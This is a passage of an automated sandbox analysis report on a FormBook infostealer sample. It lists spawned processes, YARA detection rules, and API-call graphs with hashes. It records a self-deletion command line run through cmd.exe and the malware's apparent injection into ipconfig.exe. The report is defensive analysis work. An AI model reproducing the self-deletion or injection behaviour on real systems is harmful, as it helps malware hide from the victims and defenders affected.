                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:15:22:25
                                                                                            Start date:08/04/2024
                                                                                            Path:C:\Windows\explorer.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                            Imagebase:0x7ff633410000
                                                                                            File size:5'141'208 bytes
                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:7
                                                                                            Start time:15:22:27
                                                                                            Start date:08/04/2024
                                                                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\ipconfig.exe"
                                                                                            Imagebase:0xc70000
                                                                                            File size:29'184 bytes
                                                                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:8
                                                                                            Start time:15:22:30
                                                                                            Start date:08/04/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:/c del "C:\Users\user\Desktop\hj3YCvtlg7.exe"
                                                                                            Imagebase:0xc50000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:15:22:31
                                                                                            Start date:08/04/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f010000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:7.6%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:55
                                                                                              Total number of Limit Nodes:9
                                                                                              execution_graph 16533 7341090 16534 734aa10 PostMessageW 16533->16534 16535 734aa7c 16534->16535 16536 10c4668 16537 10c467a 16536->16537 16538 10c4686 16537->16538 16540 10c4778 16537->16540 16541 10c479d 16540->16541 16545 10c4888 16541->16545 16549 10c4878 16541->16549 16546 10c48af 16545->16546 16548 10c498c 16546->16548 16553 10c44b0 16546->16553 16550 10c48af 16549->16550 16551 10c498c 16550->16551 16552 10c44b0 CreateActCtxA 16550->16552 16552->16551 16554 10c5918 CreateActCtxA 16553->16554 16556 10c59db 16554->16556 16559 10cd438 16560 10cd47e GetCurrentProcess 16559->16560 16562 10cd4c9 16560->16562 16563 10cd4d0 GetCurrentThread 16560->16563 16562->16563 16564 10cd50d GetCurrentProcess 16563->16564 16565 10cd506 16563->16565 16566 10cd543 16564->16566 16565->16564 16567 10cd56b GetCurrentThreadId 16566->16567 16568 10cd59c 16567->16568 16557 10cd680 DuplicateHandle 16558 10cd716 16557->16558 16569 10cacb0 16570 10cacbf 16569->16570 16573 10cad98 16569->16573 16581 10cada8 16569->16581 16574 10cadb9 16573->16574 16575 10caddc 16573->16575 16574->16575 16589 10cb040 16574->16589 16593 10cb031 16574->16593 16575->16570 16576 10cadd4 16576->16575 16577 10cafe0 GetModuleHandleW 16576->16577 16578 10cb00d 16577->16578 16578->16570 16582 10cadb9 16581->16582 16583 10caddc 16581->16583 16582->16583 16587 10cb040 LoadLibraryExW 16582->16587 16588 10cb031 LoadLibraryExW 16582->16588 16583->16570 16584 10cadd4 16584->16583 16585 10cafe0 GetModuleHandleW 16584->16585 16586 10cb00d 16585->16586 16586->16570 16587->16584 16588->16584 16590 10cb054 16589->16590 16591 10cb079 16590->16591 16597 10ca168 16590->16597 16591->16576 16594 10cb054 16593->16594 16595 10ca168 LoadLibraryExW 16594->16595 16596 10cb079 16594->16596 16595->16596 16596->16576 16598 10cb220 LoadLibraryExW 16597->16598 16600 10cb299 16598->16600 16600->16591

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 010CD4B6
                                                                                              • GetCurrentThread.KERNEL32 ref: 010CD4F3
                                                                                              • GetCurrentProcess.KERNEL32 ref: 010CD530
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 010CD589
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: 5f8c65ff6296e160dcfec8c643b45f01fdc038b94161b6eba809957f59001c1b
                                                                                              • Instruction ID: 05e14faa6d1ce4ef8fa2bc8e3fa00fda7d6f35d6e50a71c3b2383c094d62cb8e
                                                                                              • Opcode Fuzzy Hash: 5f8c65ff6296e160dcfec8c643b45f01fdc038b94161b6eba809957f59001c1b
                                                                                              • Instruction Fuzzy Hash: 375157B09007098FEB54CFA9D5487EEBBF1AF48314F20846DE149A7390DB745984CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 010CD4B6
                                                                                              • GetCurrentThread.KERNEL32 ref: 010CD4F3
                                                                                              • GetCurrentProcess.KERNEL32 ref: 010CD530
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 010CD589
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: Current$ProcessThread
                                                                                              • String ID:
                                                                                              • API String ID: 2063062207-0
                                                                                              • Opcode ID: a5b970c49a36ec87a39faf1300f86c6fdfb26ce3e90ab76ad94d9c9a90c81e73
                                                                                              • Instruction ID: b294df50a179e1d11c271eeb47da84f4d17935c30d7a456393eaf2b9de9c14a9
                                                                                              • Opcode Fuzzy Hash: a5b970c49a36ec87a39faf1300f86c6fdfb26ce3e90ab76ad94d9c9a90c81e73
                                                                                              • Instruction Fuzzy Hash: 365167B09007099FEB54CFAAD548BDEBBF1BB48314F20845DE009A7390DB74A984CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 44 10cada8-10cadb7 45 10cadb9-10cadc6 call 10c93d4 44->45 46 10cade3-10cade7 44->46 51 10caddc 45->51 52 10cadc8 45->52 48 10cade9-10cadf3 46->48 49 10cadfb-10cae3c 46->49 48->49 55 10cae3e-10cae46 49->55 56 10cae49-10cae57 49->56 51->46 99 10cadce call 10cb040 52->99 100 10cadce call 10cb031 52->100 55->56 57 10cae59-10cae5e 56->57 58 10cae7b-10cae7d 56->58 60 10cae69 57->60 61 10cae60-10cae67 call 10ca110 57->61 62 10cae80-10cae87 58->62 59 10cadd4-10cadd6 59->51 63 10caf18-10cafd8 59->63 64 10cae6b-10cae79 60->64 61->64 66 10cae89-10cae91 62->66 67 10cae94-10cae9b 62->67 94 10cafda-10cafdd 63->94 95 10cafe0-10cb00b GetModuleHandleW 63->95 64->62 66->67 69 10cae9d-10caea5 67->69 70 10caea8-10caeb1 call 10ca120 67->70 69->70 75 10caebe-10caec3 70->75 76 10caeb3-10caebb 70->76 78 10caec5-10caecc 75->78 79 10caee1-10caeee 75->79 76->75 78->79 80 10caece-10caede call 10ca130 call 10ca140 78->80 85 10caef0-10caf0e 79->85 86 10caf11-10caf17 79->86 80->79 85->86 94->95 96 10cb00d-10cb013 95->96 97 10cb014-10cb028 95->97 96->97 99->59 100->59
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 010CAFFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: b9c5261915d47685ce7a5fed9a247e3d1e82a7c0d49ca44927351dfa5876a32d
                                                                                              • Instruction ID: 37feaaeb8080a15deacc000f63c57e078b37636acfb47c850d514c1acadb163d
                                                                                              • Opcode Fuzzy Hash: b9c5261915d47685ce7a5fed9a247e3d1e82a7c0d49ca44927351dfa5876a32d
                                                                                              • Instruction Fuzzy Hash: 81711070A00B09CFE764DF69D45479ABBF1BF88600F108A6DD48ADBA40EB74E8458F90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 101 10c590c-10c5913 102 10c591c-10c59d9 CreateActCtxA 101->102 104 10c59db-10c59e1 102->104 105 10c59e2-10c5a3c 102->105 104->105 112 10c5a3e-10c5a41 105->112 113 10c5a4b-10c5a4f 105->113 112->113 114 10c5a60 113->114 115 10c5a51-10c5a5d 113->115 117 10c5a61 114->117 115->114 117->117
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 010C59C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              • Opcode ID: 7a9adafa8b361f25a8038d32c35badbab7996e89a1d80a9caaca12f9741e1e8c
                                                                                              • Instruction ID: ccce8f0489422c26c53c70a1bb8cd86128536d00bcf5ff06c761a745f4d7b833
                                                                                              • Opcode Fuzzy Hash: 7a9adafa8b361f25a8038d32c35badbab7996e89a1d80a9caaca12f9741e1e8c
                                                                                              • Instruction Fuzzy Hash: C141CFB4D00719CBEB24CFAAC8847CEBBF1BF49704F20806AD448AB251DB756946CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 118 10c44b0-10c59d9 CreateActCtxA 121 10c59db-10c59e1 118->121 122 10c59e2-10c5a3c 118->122 121->122 129 10c5a3e-10c5a41 122->129 130 10c5a4b-10c5a4f 122->130 129->130 131 10c5a60 130->131 132 10c5a51-10c5a5d 130->132 134 10c5a61 131->134 132->131 134->134
                                                                                              APIs
                                                                                              • CreateActCtxA.KERNEL32(?), ref: 010C59C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create
                                                                                              • String ID:
                                                                                              • API String ID: 2289755597-0
                                                                                              • Opcode ID: 13eee49f18cdfe0c7bfd61d53a26f39ce9b6b27901208d2e91db0199a1529e06
                                                                                              • Instruction ID: 32b6273360cf618aeb6a160d7cc8a0ac24690d494559cf374f5902d18db565f8
                                                                                              • Opcode Fuzzy Hash: 13eee49f18cdfe0c7bfd61d53a26f39ce9b6b27901208d2e91db0199a1529e06
                                                                                              • Instruction Fuzzy Hash: 2341CEB4D0071DCBDB24CFAAC884BCEBBB5BB49704F20846AD448AB251DB756945CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 135 10cd680-10cd714 DuplicateHandle 136 10cd71d-10cd73a 135->136 137 10cd716-10cd71c 135->137 137->136
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010CD707
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 82d9a0e4768235e29befe85cc16a9d109bd9fe594af8b1eb159543d37bc15f86
                                                                                              • Instruction ID: 570f647493001b5eba8a38e0d54f2b22c9968215c3de0a867e76a353094eeb28
                                                                                              • Opcode Fuzzy Hash: 82d9a0e4768235e29befe85cc16a9d109bd9fe594af8b1eb159543d37bc15f86
                                                                                              • Instruction Fuzzy Hash: 0321E4B5900249DFDB10CF9AD584ADEBBF4FB48310F14842AE958A3350D374A944CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 140 10cd679-10cd714 DuplicateHandle 141 10cd71d-10cd73a 140->141 142 10cd716-10cd71c 140->142 142->141
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010CD707
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 2b1ab45f140f6f6e25290201fc36aa5cd36bdf57b6b5b0db9a5523edafd8f29a
                                                                                              • Instruction ID: 6a1a6b6387a0819b9e01d4ef829a25f1ccfb9ddea41e0a4a7b58144ff7cefaab
                                                                                              • Opcode Fuzzy Hash: 2b1ab45f140f6f6e25290201fc36aa5cd36bdf57b6b5b0db9a5523edafd8f29a
                                                                                              • Instruction Fuzzy Hash: 4921F3B5900249DFDB10CFAAD584ADEBBF4FB48310F14846AE958B3350D378A944CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 145 10ca168-10cb260 147 10cb268-10cb297 LoadLibraryExW 145->147 148 10cb262-10cb265 145->148 149 10cb299-10cb29f 147->149 150 10cb2a0-10cb2bd 147->150 148->147 149->150
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010CB079,00000800,00000000,00000000), ref: 010CB28A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: 4b06729a173b700124e0d8c3560c6dabcca57f31176abc885d8dd9e225852133
                                                                                              • Instruction ID: b6e74a841137d26ce545699cc8c9fe77d106a9ee9c078f8ba94b93840604c763
                                                                                              • Opcode Fuzzy Hash: 4b06729a173b700124e0d8c3560c6dabcca57f31176abc885d8dd9e225852133
                                                                                              • Instruction Fuzzy Hash: 451100B68002099FDB10CF9AD444B9EFBF9EB48710F10846EE959B7200C379A545CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 154 10cb218-10cb260 155 10cb268-10cb297 LoadLibraryExW 154->155 156 10cb262-10cb265 154->156 157 10cb299-10cb29f 155->157 158 10cb2a0-10cb2bd 155->158 156->155 157->158
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010CB079,00000800,00000000,00000000), ref: 010CB28A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: 97dfd446ec7b8a7fd133f4cf75bee3bfbf89dca21b054cb96320360d7dae5c62
                                                                                              • Instruction ID: 76605e405f3a728bbd0b520cc2c124debe2b8c6e68738b56c4e50485709f2bf0
                                                                                              • Opcode Fuzzy Hash: 97dfd446ec7b8a7fd133f4cf75bee3bfbf89dca21b054cb96320360d7dae5c62
                                                                                              • Instruction Fuzzy Hash: AD1153B68003098FDB10CFAAC444BDEFBF4EB88310F10846EE958A7600C375A545CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 162 10caf98-10cafd8 163 10cafda-10cafdd 162->163 164 10cafe0-10cb00b GetModuleHandleW 162->164 163->164 165 10cb00d-10cb013 164->165 166 10cb014-10cb028 164->166 165->166
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 010CAFFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353446721.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10c0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 01d9a0b56c881c73f32217797035fb77beea7ab32fc7266711c6d093a212814e
                                                                                              • Instruction ID: 1651e3b9c9b2ed9abb5b2ca9be8473db374399870021a0f980f59eadb47f82d9
                                                                                              • Opcode Fuzzy Hash: 01d9a0b56c881c73f32217797035fb77beea7ab32fc7266711c6d093a212814e
                                                                                              • Instruction Fuzzy Hash: 5B1110B5C002498FDB20CF9AC444BDEFBF4AB88314F10846ED969B7210D379A545CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 168 7341090-734aa7a PostMessageW 170 734aa83-734aa97 168->170 171 734aa7c-734aa82 168->171 171->170
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0734AA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1356964784.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1356812219.00000000072D0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_72d0000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: 1326ed214400fd877c71b61ec47a472657eaee0f4cf4d269144a50c6307c7078
                                                                                              • Instruction ID: e4da64897f3ea25e12b4f09f2b3067b85ce30410faaca64762f3ecc95bf88d7c
                                                                                              • Opcode Fuzzy Hash: 1326ed214400fd877c71b61ec47a472657eaee0f4cf4d269144a50c6307c7078
                                                                                              • Instruction Fuzzy Hash: 9711F2B68003499FEB10DF9AC584BDEBBF8EB48310F10881AE959B7240D375A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353297296.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_106d000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d034da0ac4f647ebfa7c75d76c63c714c988db5212ca1415900eabfbb38f278d
                                                                                              • Instruction ID: d7f190f0231a9693bf3537cbe1ebd2add1044c882dcb68219361463c7c695e79
                                                                                              • Opcode Fuzzy Hash: d034da0ac4f647ebfa7c75d76c63c714c988db5212ca1415900eabfbb38f278d
                                                                                              • Instruction Fuzzy Hash: 04212971604345EFDB05DF94D5C0B29BBA9FB94324F24C5ADD8C94B292C336D446CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353297296.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_106d000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f7385a1f417ee7e08a1cf06335cc25bc762ad4179d25c9d241d34f6a826bf092
                                                                                              • Instruction ID: a7808422ad00557701799ed0c0299dcb17f23a82cd07cc941e60ed8e449edb4d
                                                                                              • Opcode Fuzzy Hash: f7385a1f417ee7e08a1cf06335cc25bc762ad4179d25c9d241d34f6a826bf092
                                                                                              • Instruction Fuzzy Hash: A9210371604340DFEB15DF54D4C0B26BBA9EB84214F24C5A9E88A4B282C336D407CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353297296.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_106d000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 24ce1ffb9bdea7112a8d852e9ba7a658780899987e39981f1dc16fd3dcbecf04
                                                                                              • Instruction ID: 94103fed6be89dc2a59d03d8099246a27cf017a7edd63f8411f8e018ae3e25fd
                                                                                              • Opcode Fuzzy Hash: 24ce1ffb9bdea7112a8d852e9ba7a658780899987e39981f1dc16fd3dcbecf04
                                                                                              • Instruction Fuzzy Hash: 5E21A7755093808FDB13CF64D590715BFB1EF46214F28C5DAD8898F6A7C33A980ACB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353297296.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_106d000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                                                                              • Instruction ID: 75969b1de40a323216176f7564c9af9720442bdbf6be99589d2a04f7586aa17a
                                                                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                                                                              • Instruction Fuzzy Hash: 9A11BB75604280DFCB12CF54C5C0B15BBA1FB84224F28C6AAD8894B696C33AD44ACB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353268028.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_105d000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0a913e907b0e083774a4a13b27dc7a2e8857dfab8d3d14b8a5082fdc4577a69f
                                                                                              • Instruction ID: e865f7dab9fbca2c1a872c759fedc7b0e22236dae6d90f0b368d9253e282f4df
                                                                                              • Opcode Fuzzy Hash: 0a913e907b0e083774a4a13b27dc7a2e8857dfab8d3d14b8a5082fdc4577a69f
                                                                                              • Instruction Fuzzy Hash: 9701A731104388DFF7904A95CD84B6BBBD8FF41221F18855BED494A286E6799844C772
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1353268028.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_105d000_hj3YCvtlg7.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c555d241f04e18330eeacd88d514b6052a8432b1be4a80eb3c00361a9072e3e8
                                                                                              • Instruction ID: a1dc9ac0bbd17348ebd54009dbac4f9cd0a1c6655e75812db73f6924b2e646ce
                                                                                              • Opcode Fuzzy Hash: c555d241f04e18330eeacd88d514b6052a8432b1be4a80eb3c00361a9072e3e8
